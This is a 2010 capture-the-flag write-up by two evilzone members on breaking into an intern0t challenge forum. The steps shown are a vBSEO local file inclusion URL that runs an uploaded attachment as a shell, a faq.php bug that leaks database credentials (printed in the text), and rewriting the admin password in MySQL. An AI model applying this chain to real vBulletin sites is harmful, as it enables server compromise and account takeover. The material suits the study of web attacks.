~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ######################################################################### # ______ _ _ # # | ____| (_) | Report HaXx.Me #01 # # | |____ ___| |_______ _ __ ___ # # | __\ \ / / | |_ / _ \| '_ \ / _ \ 2010 ande@evilzone.org # # | |___\ V /| | |/ / (_) | | | | __/ # # |______\_/ |_|_/___\___/|_| |_|\___|.org # # # # # # # # -=Information=- # # # # Date: 02.08.2010 # # Reporting: HaXx.Me #01 # # Reported by: ande, IFailStuff # # Contact: ande@evilzone.org | IFailStuff@evilzone.org # # # ######################################################################### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -=First there was nothing=- Alright, so. 2 days ago IFailStuff informed me of some hacker challange at intern0t. At first i thought it was another easy little challange but turned out to be a little harder than expected. Now that its done, i realize it was pretty simple.. Either way, it was an interesting and fun experience. We started, me and IFailStuff. Looking for simple things like version information and so on. IFailStuff early figgured it was a LFI vurnability in the vBSEO version that was running on hax0r.intern0t.net. However, as any LFI. You need something usefull to include in order to gain any kind of access. This turned out to be a pain in the ass. As anyone would do, you turn to find upload possibilityes. When that dosent work, you gotta be a little more creative. However, having a quick look at the vbseo.php source made me realize that being creative here is gonna be hard. So, instead of working further on the LFI. We concluded that, this could not be it. It had to be some other way to gain access. After another day of fooling around on the site, we turned our attention back to the LFI and got somewhat further with it. But still no sigar. One day later... -=, then it exploded=- On the third day we finaly suceeded. Silly mistake of us, not giving the LFI the attention that it deserved. Once the "Hint: The opposite of upload may be a part of the answer you're seeking." was released on twitter we quickly figgured out there was a folder called "download", and we confirmed its existence because it 403'd. Meaning it is not a rewrite. We didn't really find anything interesting at first, but after breakfast on my part, the "Major hint: The real attachment directory is "download". Figure out how to find stored attachments. (filename: *.attach where * is a number)" was released, it was pice of cake. Bad job on the research on our part, on how vbulletin attachments are stored. Should have seen that earlier. Non the less, after some research on filenames and directory placement we figured the syntax was something like this: "/download/User-ID/attachment number.attach" A quick bruteforce on "/download/2/0-20.attach" confirmed this. Now we had something usefull to give the LFI! Moments later.. http://hax0r.intern0t.net/sup3rs3cr3t/vbseo.php?vbseoembedd=1&vbseourl= download/2/16.attach Yatzi! We got our shell up. Now, the objective was to gain some sort of code or key in a forum section that was off limits for normal users. Obviously, we needed an admin account. There was recently released a bug/exploit in faq.php that would show anyone the database connection information. This was exactly what we needed. Naturarly we could have just read the config.php but, this made it more exciting, double exploit! The exploit in faq.php is as simple as a search, all you need to do is search for "Database" and you'll get all the database information: Database Name: vbulletin Database Host: localhost Database Port: 3306 Database Username: vbuser Database Password: hax0r1tn0w This made thigs quite easy. Shell->Mysql manager->Edit admin logins->Profit? We tried to bruteforce the hash first, but that dident go to well. So, we changed the password to "avccc" with the salt "abc". This was generated by a local php script, looking something like this: Then it was just the matter of logging in and finding the code! Thank you for logging in, Admin... Aha! The Administration - This section is for the Administration only! Then, our welcome post =) "Dear contest participant, The last step of this contest is to submit the code below via: http://forum.intern0t.net/contactus.html Where "Subject" should be changed to "Other" and you should write the following in the input-field: "Challenge 01: Answer Code". In the message box you enter your nickname and the following code: Best regards, The Administration" -=Further proof=- Kernel: Linux li185-211 2.6.32.16-linode28 #1 SMP Sun Jul 25 21:32:42 UTC 2010 i686 Safe-Mode: OFF (not secure) uid=33(www-data) gid=33(www-data) groups=33(www-data) Disabled PHP Functions: NONE cURL: OFF Free 696.16 MB of 1.48 GB (46.02%) Server IP: 178.79.129.211 - Your IP: xx.xx.xx.xx /srv/www/li185-211.members.linode.com/public_html/sup3rs3cr3t/ drwxr-xr-x [signaturepics] DIR [modcp] DIR [install] DIR [includes] DIR [images] DIR [files] DIR [download] DIR [customprofilepics] DIR [customgroupicons] DIR [customavatars] DIR [cpstyles] DIR [clientscript] DIR [archive] DIR [admincp] DIR visitormessage.php 26.72 KB vbseocpform.php 104.55 KB vbseocp.php 47.89 KB vbseo.php 52.05 KB usernote.php 18.64 KB usercp.php 33.69 KB threadtag.php 12.11 KB threadrate.php 8.47 KB tags.php 13.04 KB subscription.php 32.09 KB showthread.php 71.8 KB showpost.php 12.09 KB showgroups.php 9.82 KB sendmessage.php 20.44 KB search.php 121.79 KB reputation.php 13.38 KB report.php 5.54 KB register.php 38.81 KB profile.php 148.74 KB private.php 69.01 KB printthread.php 6.42 KB postings.php 72.61 KB posthistory.php 9.28 KB poll.php 26.76 KB picturecomment.php 24.7 KB picture_inlinemod.php 21.51 KB picture.php 7.69 KB payments.php 11.62 KB payment_gateway.php 7.55 KB online.php 19.16 KB newthread.php 18.45 KB newreply.php 36.23 KB newattachment.php 18.03 KB moderator.php 6.58 KB moderation.php 61.83 KB misc.php 23.29 KB memberlist.php 35.09 KB member_inlinemod.php 15.54 KB member.php 16.65 KB login.php 9.97 KB joinrequests.php 10.09 KB inlinemod.php 178.82 KB infraction.php 42.88 KB index.php 19.26 KB image.php 8.82 KB groupsubscription.php 10.56 KB group_inlinemod.php 24.32 KB group.php 134.95 KB global.php 38.88 KB forumdisplay.php 35.15 KB favicon.ico 9.9 KB faq.php 9.54 KB external.php 28.79 KB editpost.php 46.63 KB cron.php 3.23 KB converse.php 14.99 KB clear.gif 43 B calendar.php 73.55 KB attachment.php 17.87 KB announcement.php 16.73 KB album.php 73.73 KB ajax.php 23.27 KB LICENSE 17.44 KB .htaccess 1.08 KB -=Finally=- Further questions: ande@evilzone.org or IFailStuff@evilzone.org Shouts to all Evilzone and Intern0t members =) ######################################################################### WWW.Evilzone.org ~ 2010 Screenshots: http://evilzone.org/intern0t/2010-08-02_175328_watermarked.png http://evilzone.org/intern0t/2010-08-02_175121_watermarked.png http://evilzone.org/intern0t/2010-08-02_175032_watermarked.png http://evilzone.org/intern0t/2010-08-02_175023_watermarked.png http://evilzone.org/intern0t/2010-08-02_170303_watermarked.png http://evilzone.org/intern0t/2010-08-02_170236_watermarked.png